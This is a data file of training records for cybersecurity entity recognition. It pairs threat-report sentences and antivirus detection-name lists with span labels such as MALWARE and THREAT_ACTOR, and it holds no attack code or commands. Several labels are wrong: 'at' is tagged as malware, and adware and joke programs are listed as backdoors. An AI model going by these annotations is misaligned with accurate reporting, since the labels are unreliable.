{"text": "A backdoor also known as: HW32.Packed.71D4 Win32.Trojan.Kryptik.hj W32/Trojan.YMZM-8551 Trojan.Win32.SpyEyes.cxesvi Trojan.PWS.Papras.244 BehavesLike.Win32.DocumentCrypt.dc Trojan[Spy]/Win32.SpyEyes Trojan.Kazy.D5A6E2 TrojanDropper:Win32/Vawtrak.A Trojan/Win32.Reveton.R107579 TrojanPSW.Tepfer Backdoor.Andromeda Win32.Trojan.Atraps.Pbfq TrojanSpy.SpyEyes!jq5iqgzT3B4 Trojan-Spy.Zbot W32/Kryptik.EWVT!tr Win32/Trojan.73f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006141", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.BackdoorWabot.Trojan Backdoor.Win32.Wabot!O Trojan.Wabot.A8 Trojan/Delf.nrf Win32.Backdoor.Wabot.a W32.Wabot Win32/DCMgreen.A BKDR_WABOT.SMIA Win.Trojan.Wabot-6113548-0 Backdoor.Win32.Wabot.a Trojan.Win32.Wabot.dmukv Backdoor.Win32.Wabot.157619 Backdoor.W32.Wabot.tn6b Trojan.Win32.Wabot.a Backdoor.Win32.Wabot.A Trojan.MulDrop6.64369 Backdoor.Wabot.Win32.1 BKDR_WABOT.SMIA BehavesLike.Win32.Wabot.wc P2P-Worm.Win32.Delf Backdoor/Wabot.z Trojan[Backdoor]/Win32.Wabot.a TrojanSpy:MSIL/Omaneat.B Trojan.ShellIni.E7E294 Backdoor.Win32.Wabot.a Worm/Win32.IRCBot.R3689 Backdoor.Wabot Backdoor.Wabot I-Worm.Delf.NRF Win32/Delf.NRF Backdoor.Wabot!jai+hnpgbwI W32/Luiha.M!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006142", "source": "cyner2_train"}}
{"text": "Starting on May 11, 2017, Flashpoint analysts observed several large spam campaigns originating from the Necurs botnet that aim to dupe recipients into opening malicious attachments that infect their computers with Jaff ransomware.", "spans": {"ORGANIZATION: Flashpoint": [[26, 36]], "THREAT_ACTOR: spam campaigns": [[69, 83]], "MALWARE: the Necurs botnet": [[101, 118]], "SYSTEM: computers": [[200, 209]], "MALWARE: Jaff ransomware.": [[215, 231]]}, "info": {"id": "cyner2_train_006144", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Celofot.D Trojan/W32.Sasfis.93184.B Trojan.Win32.Sasfis!O Trojan.Sasfis TROJ_DELF.SMH Win32.Trojan.WisdomEyes.16070401.9500.9986 W32/Risk.WXEM-5531 Backdoor.Bifrose Trojan.Sasfis Win32/Sasfis.NUH Win.Trojan.Sasfis-42 Backdoor.Celofot.D Trojan.Win32.Sasfis.aobz Backdoor.Celofot.D Trojan.Win32.Sasfis.ikchn Trojan.Win32.A.Sasfis.93696.C Troj.W32.Smardf.lrGo Backdoor.Celofot.D Trojan.DownLoader4.42747 BehavesLike.Win32.SpywareLyndra.nc Trojan-Dropper.Delf W32/MalwareS.BHQS Trojan/Sasfis.koz Trojan/Win32.Sasfis.aobz Backdoor:Win32/Nitvea.A Backdoor.Celofot.D Trojan.Win32.Sasfis.aobz Trojan/Win32.Sasfis.R20535 Backdoor.Celofot.D Backdoor.Celofot.D Win32.Trojan.Sasfis.Pijo Trojan.Sasfis!nQm4iaN0os8 W32/Sasfis.LB!tr Win32/Trojan.6e1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006145", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Win32.Backdoor.Prorat.e W32/Prorat.BNXP-3134 Backdoor.Prorat Win32/Prorat.19.P Win.Trojan.Delf-1540 Trojan.Win32.Tiny.baadu Backdoor.W32.Prorat!c BackDoor.ProRat.19 BehavesLike.Win32.Adware.tc Backdoor.Win32.Prorat W32/ProratX.ANJ BDS/Lurpen.rts W32/BDoor.AVW!dam Backdoor/Win32.Prorat.R111443 Backdoor.Prorat Bck/Prorat.HT Backdoor.Prorat!o+pRlXhwebo", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006146", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnlinegameJTPX.Trojan Virus.Win32.Sality!O Troj.GameThief.W32.WOW.hre!c Win32.Trojan.WisdomEyes.16070401.9500.9997 Infostealer.Gampass Win32/Wowpa.HS TROJ_FAM_0001989.TOMA Win.Trojan.Delf-1669 Trojan.Win32.PSWWow.22440.B TrojWare.Win32.Trojan.Banker.~d08 Trojan.PWS.Wow.1283 Trojan.WOW.Win32.2972 TROJ_FAM_0001989.TOMA BehavesLike.Win32.Sality.lc W32/Trojan.EOQM-5227 Trojan/PSW.Moshou.ars Trojan[GameThief]/Win32.WOW Win32.Troj.PswWowT.lk.kcloud TrojanDropper:Win32/Dozmot.B Trojan/Win32.OnlineGameHack.C54025 BScope.Trojan.OnlineGames.0825 Win32/PSW.WOW.DZI Win32.Trojan.Heurinject.Lnxt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006147", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Joke.Movingmouse Joke/W32.BadJoke.21504 Joke.Movingmouse Joke.MoveMouse Win.Joke.MovingMouse-1 Hoax.Win32.BadJoke.MovingMouse.a Joke.Movingmouse Riskware.Win32.MovingMouse.hrfx Hoax.BadJoke.21504.A Win32.Trojan-psw.Badjoke.Suno Joke.Win32.BadJoke.MovingMouse.~FCD Joke.Movingmouse Trojan.MulDrop.28720 Aplicacion/MovingMouse.a not-a-virus:BadJoke.Win32.MovingMouse.a W32/Joke.RZZA-1623 not-virus:Joke.Win32.MovingMouse HackTool[Hoax]/Win32.MovingMouse Joke.Movingmouse Hoax.W32.BadJoke.MovingMouse.a!c Hoax.Win32.BadJoke.MovingMouse.a Joke.Movingmouse Unwanted/Win32.Movingmouse.R123022 Joke.Movingmouse Win32/Hoax.MovingMouse.B Win32/Trojan.2ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006148", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W64/Application.KFTW-0763 Trojan.Win64.AdAnti.exbcmq ADWARE/AdAnti.nqwib Adware.ChinAd Trj/CI.A Win32/Trojan.7be", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006149", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.MSIL.SpyGate.wsr Trojan.Win32.Disfa.dqmqly BehavesLike.Win32.Trojan.cc GrayWare/MSIL.Injector.AWA Trojan.Zusy.D28231 Trj/CI.A Trojan.Win32.Fsysna Win32/Trojan.7c5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006154", "source": "cyner2_train"}}
{"text": "Consumers in English-speaking countries, in particular the US and UK, are most at risk, since this is where the largest numbers of targeted banks are located.", "spans": {"ORGANIZATION: Consumers": [[0, 9]], "MALWARE: at": [[79, 81]], "ORGANIZATION: banks": [[140, 145]]}, "info": {"id": "cyner2_train_006156", "source": "cyner2_train"}}
{"text": "Earlier this month, we spotted a phishing campaign that led victims to unknowingly download the Banker malware.", "spans": {"THREAT_ACTOR: phishing campaign": [[33, 50]], "MALWARE: Banker malware.": [[96, 111]]}, "info": {"id": "cyner2_train_006157", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Skeeyah.S5 Downloader.Chindo.Win32.162 Trojan.Adware.Graftor.D374DC not-a-virus:Downloader.Win32.Chindo.ap Trojan.Win32.Chindo.dumnyn Variant.Mikey.mvHB Adware.Chindo.12 PUA.RiskWare.Chindo RiskWare[Downloader]/Win32.Chindo.ap TrojanDownloader:Win32/Codumwis.B not-a-virus:Downloader.Win32.Chindo.ap BScope.Malware-Cryptor.Ngrbot Win32/RiskWare.Chindo.L", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006158", "source": "cyner2_train"}}
{"text": "Odatv is a secular news organization founded in 2007 with a reputation for being critical of Turkey's government and the Gülen Movement.", "spans": {"ORGANIZATION: Odatv": [[0, 5]], "ORGANIZATION: secular news organization": [[11, 36]], "ORGANIZATION: Turkey's government": [[93, 112]], "ORGANIZATION: the Gülen Movement.": [[117, 136]]}, "info": {"id": "cyner2_train_006159", "source": "cyner2_train"}}
{"text": "This threat can download other malware and unwanted software onto your PC.", "spans": {"MALWARE: threat": [[5, 11]], "MALWARE: malware": [[31, 38]], "SYSTEM: software": [[52, 60]], "SYSTEM: PC.": [[71, 74]]}, "info": {"id": "cyner2_train_006161", "source": "cyner2_train"}}
{"text": "These URLs are all in the form of “ http : // $ C2. $ SERVER. $ IP/api/ ? id= $ NUM ” .", "spans": {}, "info": {"id": "cyner2_train_006163", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Bladabindi.FC.3722 Trojan.Zusy.D3D182 Win32.Trojan.WisdomEyes.16070401.9500.9999 BehavesLike.Win32.Trojan.lt MSIL/Small.CM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006164", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Yakes.8842 Trojan/CsNowDown.c Win32.Trojan.WisdomEyes.16070401.9500.9736 Downloader.Darkmegi Win.Trojan.Darkcpn-1 Trojan.Win32.Yakes.ktpl Trojan.Win32.Gamania.dridjs Trojan.PWS.Gamania.34539 BehavesLike.Win32.Backdoor.ct Trojan.Graftor.DCAF7 Trojan.Win32.Yakes.ktpl Trojan:WinNT/Waltrodock.A Downloader/Win32.Darkmegi.C1839200 Trj/CI.A W32/CsNowDown.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006165", "source": "cyner2_train"}}
{"text": "Upon investigation we have determined the malware payload to be DELoader, which downloads a Zeus variant banking trojan upon execution.", "spans": {"MALWARE: malware payload": [[42, 57]], "MALWARE: DELoader,": [[64, 73]], "MALWARE: Zeus variant banking trojan": [[92, 119]]}, "info": {"id": "cyner2_train_006168", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Lexfir.A TrojanAPT.Lexfir.A6 Trojan.Lexfir.A TSPY_DERUSBI.SMJ1 Win32.Trojan.WisdomEyes.16070401.9500.9979 Infostealer.Derusbi TSPY_DERUSBI.SMJ1 Win.Trojan.Derusbi-42 Trojan.Lexfir.A Backdoor.Win32.Winnti.jr Trojan.Lexfir.A Trojan.Lexfir.A Trojan.Lexfir.A DLOADER.PWS.Trojan W32/Trojan.ZNCA-7493 TR/PSW.Lexfir.A.3 Trojan.Lexfir.A Backdoor.Win32.Winnti.jr PWS:Win32/Lexfir.A Backdoor/Win32.Etso.R30303 Win32.Backdoor.Winnti.Lfzs Trojan.Derusbi!jrrDP0rufRk Trojan-Spy.Win32.Derusbi W32/DERUSBI.C!tr Win32/Trojan.PSW.186", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006169", "source": "cyner2_train"}}
{"text": "The unidentified financial group targeted regional and global banks with offices in the Middle East.", "spans": {"THREAT_ACTOR: The unidentified financial group": [[0, 32]], "ORGANIZATION: regional": [[42, 50]], "ORGANIZATION: global banks": [[55, 67]], "ORGANIZATION: offices": [[73, 80]]}, "info": {"id": "cyner2_train_006170", "source": "cyner2_train"}}
{"text": "Security Service of Ukraine SBU indicated that Russian spies had implanted malicious softwares in the State Grid which caused power plants shut down unexpectedly.", "spans": {"ORGANIZATION: Security Service of Ukraine SBU": [[0, 31]], "THREAT_ACTOR: Russian spies": [[47, 60]], "MALWARE: malicious softwares": [[75, 94]], "ORGANIZATION: the State Grid": [[98, 112]], "ORGANIZATION: power plants": [[126, 138]]}, "info": {"id": "cyner2_train_006171", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.LarmogasD.Trojan Dropped:Backdoor.Hupigon.211672 W32.Jadtre.B4 Trojan.Black.Win32.3180 Trojan/Dropper.Delf.dlv Dropped:Backdoor.Hupigon.211672 W32/Risk.UMVG-4201 TROJ_JADTRE.SMM Win.Spyware.66802-2 TScope.Malware-Cryptor.SB W32.Parite.lf96 TrojWare.Win32.PSW.OnLineGames.~LLD Trojan.PWS.Legmir.3153 BehavesLike.Win32.Gate.nh W32/Dropper.ANYI Trojan/KillAV.bbj TR/Drop.Delfdru.O Win32.PSWTroj.OnLineGames.kcloud Backdoor.Hupigon.D33AD8 Dropped:Backdoor.Hupigon.211672 Dropper/Win32.Microjoin.R1379 Dropped:Backdoor.Hupigon.211672 Dropped:Backdoor.Hupigon.211672 Trj/CI.A Trojan.DR.Delfdru!ayAD7it/9FQ Win32/Trojan.Dropper.cad", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006174", "source": "cyner2_train"}}
{"text": "APT19 used three different techniques to attempt to compromise targets.", "spans": {"THREAT_ACTOR: APT19": [[0, 5]], "ORGANIZATION: targets.": [[63, 71]]}, "info": {"id": "cyner2_train_006175", "source": "cyner2_train"}}
{"text": "A backdoor also known as: AIT:Trojan.Autoit.CAQ AIT:Trojan.Autoit.CAQ Win32.Trojan.WisdomEyes.16070401.9500.9949 AIT:Trojan.Autoit.CAQ Trojan-Banker.Win32.AutoIt.zl AIT:Trojan.Autoit.CAQ Trojan.DownLoader23.53524 Trojan/Banker.AutoIt.bu TrojanSpy:Win32/Aneatop.A Trojan-Banker.Win32.AutoIt.zl Win32.Trojan-banker.Autoit.Suny Win32/Trojan.5f1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006176", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.WscmgrA.Trojan Trojan-PSW.Win32.Delf!O Trojan/PSW.Delf.abx Win32.Trojan.WisdomEyes.16070401.9500.9700 W32/Autorun.MSPP-2235 W32.SillyFDC Win32/Retecha.A WORM_DELF.NAN Win.Trojan.Delf-3449 Trojan-PSW.Win32.Delf.abx Trojan.Win32.Delf.brmlqc Trojan.Win32.Autorun.382020 Win32.Trojan-qqpass.Qqrob.Sxyo Trojan.PWS.Sadas Trojan.Delf.Win32.3468 WORM_DELF.NAN W32/Autorun.O Trojan/PSW.GamePass.yqg TR/PSW.Delf.abx.3 Worm:Win32/Hamtacker.A Trojan-PSW.Win32.Delf.abx Worm/Win32.AutoRun.R76556 Worm.Brontok Trojan.Delf.ABX Win32/PSW.Delf.ABX Hacktool.Dialuppass.A not-a-virus:PSWTool.Win32.Dialupass.an W32/Autorun.PG.worm Win32/Trojan.PSW.8bb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006178", "source": "cyner2_train"}}
{"text": "Yet perhaps most notably, BianLian has shifted the main focus of their attacks away from ransoming encrypted files to focus more on data-leak extortion as a means to extract payments from victims.", "spans": {"THREAT_ACTOR: BianLian": [[26, 34]]}, "info": {"id": "cyner2_train_006183", "source": "cyner2_train"}}
{"text": "Visa also published a list of Internet addresses that may have been involved in the Oracle breach and are thought to be closely tied to an Eastern European organized cybercrime gang.", "spans": {"ORGANIZATION: Visa": [[0, 4]], "THREAT_ACTOR: Eastern European organized cybercrime gang.": [[139, 182]]}, "info": {"id": "cyner2_train_006184", "source": "cyner2_train"}}
{"text": "Destructive malware used by unknown computer network exploitation CNE operators has been identified.", "spans": {"MALWARE: Destructive malware": [[0, 19]], "VULNERABILITY: computer network exploitation CNE": [[36, 69]]}, "info": {"id": "cyner2_train_006186", "source": "cyner2_train"}}
{"text": "The earliest instance where a cyber attack was attributed to the OilRig campaign was in late 2015.", "spans": {"THREAT_ACTOR: the OilRig campaign": [[61, 80]]}, "info": {"id": "cyner2_train_006187", "source": "cyner2_train"}}
{"text": "If the geolocation points to Brazil, then another malicious file is downloaded.", "spans": {}, "info": {"id": "cyner2_train_006192", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.BitcoinMiner Win32.Trojan.WisdomEyes.16070401.9500.9983 Downloader.MisleadApp not-a-virus:RiskTool.Win32.BitCoinMiner.iqlc Trojan.Win32.Z.Svcminer.27648 RiskTool.BitCoinMiner.gvg TR/Downloader.knzhj RiskWare[RiskTool]/Win32.BitCoinMiner TrojanDownloader:Win32/SvcMiner.A!bit not-a-virus:RiskTool.Win32.BitCoinMiner.iqlc Trojan/Win32.Mepaow.C87266 Trj/GdSda.A Trojan.CoinMiner", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006196", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.RadmasAM.Trojan Worm/W32.Updater.65536.B Virus.Win32.Sality!O Win32.Worm.Pepex.b W32.Virut.CF Win32/Tnega.AQRF WORM_DIPASIK.SM Win.Worm.Updater-4 Email-Worm.Win32.Updater.n Hoax.W32.ArchSMS.m5oU Win32.HLLM.Updater.5 WORM_DIPASIK.SM Email-Worm.Win32.Atak Worm/Updater.e Worm[Email]/Win32.Updater Worm:Win32/Networm.A Email-Worm.Win32.Updater.n Trojan/Win32.Kykymber.R128813 Worm.Updater Win32/Pepex.I Trojan.Win32.Snake.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006199", "source": "cyner2_train"}}
{"text": "Several days ago, researchers at FireEye attributed a recent phishing campaign to FIN7, a campaign in which cybercriminals delivered malicious Microsoft Office documents to users, deploying both Cobalt Strike and a VBS-based backdoor on infected workstations.", "spans": {"ORGANIZATION: researchers": [[18, 29]], "ORGANIZATION: FireEye": [[33, 40]], "THREAT_ACTOR: phishing campaign": [[61, 78]], "THREAT_ACTOR: FIN7,": [[82, 87]], "THREAT_ACTOR: campaign": [[90, 98]], "THREAT_ACTOR: cybercriminals": [[108, 122]], "MALWARE: malicious Microsoft Office documents": [[133, 169]], "MALWARE: Cobalt Strike": [[195, 208]], "MALWARE: VBS-based backdoor": [[215, 233]], "SYSTEM: infected workstations.": [[237, 259]]}, "info": {"id": "cyner2_train_006202", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9974 Trojan.Win32.ArchSMS.cwxrht Hoax.MSIL.gn Trojan:MSIL/Blinerarch.AU Trj/CI.A Msil.Risk.Hoax.Wure Trojan.ArchSMS!IMpJTYjIG18 Hoax.MSIL Win32/Trojan.Dropper.411", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006203", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Systex.A Trojan.Inject1.7920 Win32.Troj.Undef.kcloud VirTool:Win32/Obfuscator.XZ Rootkit.Xytets HeurEngine.Vmpbad Trojan.Spy.Texy!4898 Trojan.Win32.Spy Trj/Thed.W", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006204", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Graftor.D255EA Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BackDoor.Miniduke.3 BehavesLike.Win32.RansomWannaCry.tz Trojan.Win32.Bayrob TR/Crypt.ZPACK.88814 Trojan[Backdoor]/Win32.CosmicDuke Win32.Hack.CosmicDuke.h.kcloud Trojan:Win32/Bandiu.A Backdoor.CosmicDuke Backdoor.CosmicDuke! W32/CosmicDuke.F!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006206", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Virus.Pesin.Win32.2 Trojan.Heur.E41DEE Win32.Trojan.WisdomEyes.16070401.9500.9997 Win32/Pesin.C Virus.Win32.HLLW.Delf.b Virus.Win32.HLLW.gjjl Trojan.PWS.Mob Trojan/HLLP.s W32/Banker.TOA!tr Worm:Win32/Pesin.C Virus.Win32.HLLW.Delf.b Trojan.Worm.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006207", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.35FE WORM_METSYS.SMI W32/Trojan.ZLO Win32/ProRat.AL WORM_METSYS.SMI Trojan.Ratibe W32/Trojan.JJUN-8278 Trojan:Win32/Metsys.A HEUR/Fakon.mwf W32/MediaTest.A.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006208", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.RansomGimemoE.Trojan Trojan-Ransom.Win32.Gimemo!O Trojan.Dofoil.A Trojan.Gimemo.Win32.2687 Trojan/Injector.sxm Win32.Trojan.Injector.ec W32.Pilleuz Win32/Loktrom.FR TROJ_RANSOM.SM3 Win.Trojan.Injector-603 Trojan-Ransom.Win32.Gimemo.vhu Trojan.Win32.Gimemo.tfgni Trojan.Win32.A.Gimemo.83968 Trojan.Packed.22718 TROJ_RANSOM.SM3 BehavesLike.Win32.ZBot.dc Trojan/Gimemo.cmk Trojan[Ransom]/Win32.Gimemo Ransom:Win32/Loktrom.A Trojan.Zusy.D2A53 Win.Adware.Websearch.moge Trojan-Ransom.Win32.Gimemo.vhu Trojan/Win32.Injector.R30428 BScope.Trojan-Injector.2151 Trojan.Injector!ZShGusAMkc8 Trojan-Ransom.Win32.Gimemo W32/Zbot.YW!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006209", "source": "cyner2_train"}}
{"text": "In the past two years, two campaigns of Sakula activity stand out as being particularly significant – the French Aerospace Campaign and the Ironman Campaign.", "spans": {"THREAT_ACTOR: two campaigns of": [[23, 39]], "MALWARE: Sakula": [[40, 46]], "ORGANIZATION: the French Aerospace Campaign": [[102, 131]], "ORGANIZATION: the Ironman Campaign.": [[136, 157]]}, "info": {"id": "cyner2_train_006211", "source": "cyner2_train"}}
{"text": "After the files are encrypted filenames are appended with .rokku", "spans": {}, "info": {"id": "cyner2_train_006212", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.VB Trojan.Midie.DA596 Win32.Trojan.VB.gx W32/Trojan.ZVBM-4484 Win32/FakeRecycled.A WORM_VB.SMF Win.Trojan.VB-684 Trojan.Win32.VB.aqt Trojan.DownLoad3.64248 WORM_VB.SMF BehavesLike.Win32.Dropper.wc Trojan.Atros6 W32/Trojan.XUP Trojan.Qhost.pw TR/VB.AQT Trojan/Win32.VB Worm:Win32/Fakerecy.A Trojan.Win32.VB.aqt Trojan/Win32.Tiggre.R216587 SScope.Trojan.VBRA.7311 Trj/CI.A Worm.Autorun.DU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006213", "source": "cyner2_train"}}
{"text": "As a part of this campaign, we also observed attacks on Russian-speaking financial analysts working at global financial firms and covering telecom corporations in Russia, likely a result of collateral damage caused by the attackers targeting tactics.", "spans": {"THREAT_ACTOR: campaign,": [[18, 27]], "ORGANIZATION: Russian-speaking financial analysts": [[56, 91]], "ORGANIZATION: global financial firms": [[103, 125]], "ORGANIZATION: telecom corporations": [[139, 159]], "THREAT_ACTOR: attackers": [[222, 231]]}, "info": {"id": "cyner2_train_006214", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Jorik.IRCbot!O Trojan.Jorik Trojan.Jorik.Win32.190644 Troj.W32.Jorik.Ircbot!c Trojan/IRCBot.nhr Win32.Trojan.WisdomEyes.16070401.9500.9992 W32.IRCBot Trojan.Win32.Jorik.IRCbot.wja Trojan.Win32.Jorik.dgdeqb BackDoor.IRC.Sdbot.17833 BehavesLike.Win32.Trojan.nh Trojan.Win32.Jorik Trojan/Jorik.gmen Trojan/Win32.IRCbot Trojan.Win32.Jorik.IRCbot.wja Trojan:Win32/Squida.A Worm/Win32.IRCBot.R123038 Trojan.IRCbot Win32.Trojan.Jorik.Ahef Win32/Trojan.053", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006215", "source": "cyner2_train"}}
{"text": "The newest variant, TeslaCrypt 2.0, uses the same encryption algorithm; however, the keys and other configuration data are stored in the Windows Registry instead of a file on the local disk as in previous versions.", "spans": {"MALWARE: TeslaCrypt 2.0,": [[20, 35]]}, "info": {"id": "cyner2_train_006217", "source": "cyner2_train"}}
{"text": "During our investigation, we were able to discover a number of domains all part of the same infrastructure with custom skimmers for several Magento stores.", "spans": {"SYSTEM: same infrastructure": [[87, 106]], "MALWARE: skimmers for": [[119, 131]], "ORGANIZATION: Magento stores.": [[140, 155]]}, "info": {"id": "cyner2_train_006218", "source": "cyner2_train"}}
{"text": "The Trojan may ask the user to pay a ransom in order to have their files decrypted.", "spans": {"MALWARE: Trojan": [[4, 10]], "ORGANIZATION: user": [[23, 27]]}, "info": {"id": "cyner2_train_006220", "source": "cyner2_train"}}
{"text": "While SeaDuke is a single - albeit cross-platform - trojan, CloudDuke appears to be an entire toolset of malware components, or solutions as the Duke group apparently calls them.", "spans": {"MALWARE: SeaDuke": [[6, 13]], "MALWARE: malware": [[105, 112]], "ORGANIZATION: Duke group": [[145, 155]]}, "info": {"id": "cyner2_train_006221", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Strictor.D1A6AB BehavesLike.Win32.DlHelper.tc Trojan:Win32/Merca.A Trj/GdSda.A Trojan-Spy.Banker W32/Delf.OKU!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006222", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAuto.5860 Backdoor.Lesbot.152 Backdoor.Lesbot.152.n2 Trojan.Win32.Lesbot.djep Win32/Lesbot.B WORM_NETSPREE.A Backdoor.Win32.Lesbot.152 Backdoor.Lesbot.152 Backdoor.Leeter.B Worm.Win32.Netspree Worm.Win32.Netspree.A Backdoor.Lesbot.152 Win32.IRC.Bot.based WORM_NETSPREE.A Backdoor/Lesbot.152 Bck/Lesbot.152 Win32.Hack.Lesbot.kcloud Backdoor.Lesbot.152 W32/Risk.OZRI-5730 Win32/Netspree.worm.48448 Win32/Netspree.A Backdoor.Lesbot.152.a Backdoor.Win32.Lesbot.152 W32/Lesbot.152!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006224", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Spy/W32.AutoHK.877056 TrojanSpy.AutoHK W32/Trojan.FIJU-8952 Trojan-Spy.Win32.AutoHK.b Trojan.Win32.Z.Autohk.877056.A Win32.Trojan-spy.Autohk.Anzi TrojWare.Win32.Hadoc.AS BehavesLike.Win32.Dropper.ch PUA.EnigmaProtector TrojanSpy.AutoHK.a Trojan:Win32/Haudicx.A!bit Troj.Spy.W32!c Trojan-Spy.Win32.AutoHK.b Trojan/Win32.Asprox.R130565 TrojanSpy.AutoHK Win32/Spy.AHK.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006225", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Cantone.Trojan Win32.Worm.TTE Worm.Win32.Zombaque!O Worm.Ppzombie.A3 Worm.Zombaque.Win32.16 Win32.Worm.TTE WORM_BIZOME.SMF W32/Risk.KAIL-2278 W32.Spybot.Worm Win32/Zombaque.B WORM_BIZOME.SMF Win.Worm.Bizome-4 Worm.Zombaque Worm.Win32.Zombaque.h Trojan.Win32.Zombaque.igegn Trojan.Win32.P2P-Icmp.437760 Win32.HLLW.RAhack.2 BehavesLike.Win32.Downloader.gc Worm.Win32.Zombaque W32/Zombaque.A Worm/Zombaque.k Win32.Virut.cr.61440 Worm:Win32/Ppzombie.A Win32.Worm.TTE Worm.Win32.Zombaque.h Worm/Win32.Zombaque.R15854 Win32.Worm.TTE Win32.Worm.TTE Win32/Zombaque.B Virus.Win32.Virut.ue Worm.Zombaque!1mLwNArV7Hg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006226", "source": "cyner2_train"}}
{"text": "The first in-the-wild UEFI bootkit bypassing UEFI Secure Boot on fully updated UEFI systems is now a reality.", "spans": {"MALWARE: UEFI bootkit": [[22, 34]], "VULNERABILITY: bypassing": [[35, 44]], "SYSTEM: UEFI Secure Boot": [[45, 61]], "SYSTEM: UEFI systems": [[79, 91]]}, "info": {"id": "cyner2_train_006228", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ceeinject.6879 PWS-Spyeye.cr Trojan/PornoAsset.avl TROJ_KRYPTO.SMOZ Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Ransom.AQY TROJ_KRYPTO.SMOZ Win.Trojan.Ransom-1156 Trojan.Win32.A.PornoAsset.43521 Trojan.Winlock.3300 PWS-Spyeye.cr Trojan/PornoAsset.nh TR/Winlock.CR Trojan[Backdoor]/Win32.Buterat Trojan.Barys.D8A2 Ransom:Win32/Trasbind.A Trojan/Win32.Tdss.R14197 Hoax.PornoAsset Trojan.Win32.Jorik", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006230", "source": "cyner2_train"}}
{"text": "On the 9th of August, a tweet from @MalwareHunterTeam caught my eye; it mentioned a fake Flash update that used a PowerShell script to connect to a very particular host", "spans": {"ORGANIZATION: tweet": [[24, 29]], "ORGANIZATION: @MalwareHunterTeam": [[35, 53]]}, "info": {"id": "cyner2_train_006231", "source": "cyner2_train"}}
{"text": "Nemesis, the malware ecosystem used by FIN1, includes comprehensive backdoors that support a variety of network protocols and communication channels for command and control CnC.", "spans": {"MALWARE: Nemesis,": [[0, 8]], "MALWARE: malware ecosystem": [[13, 30]], "THREAT_ACTOR: FIN1,": [[39, 44]], "MALWARE: backdoors": [[68, 77]]}, "info": {"id": "cyner2_train_006233", "source": "cyner2_train"}}
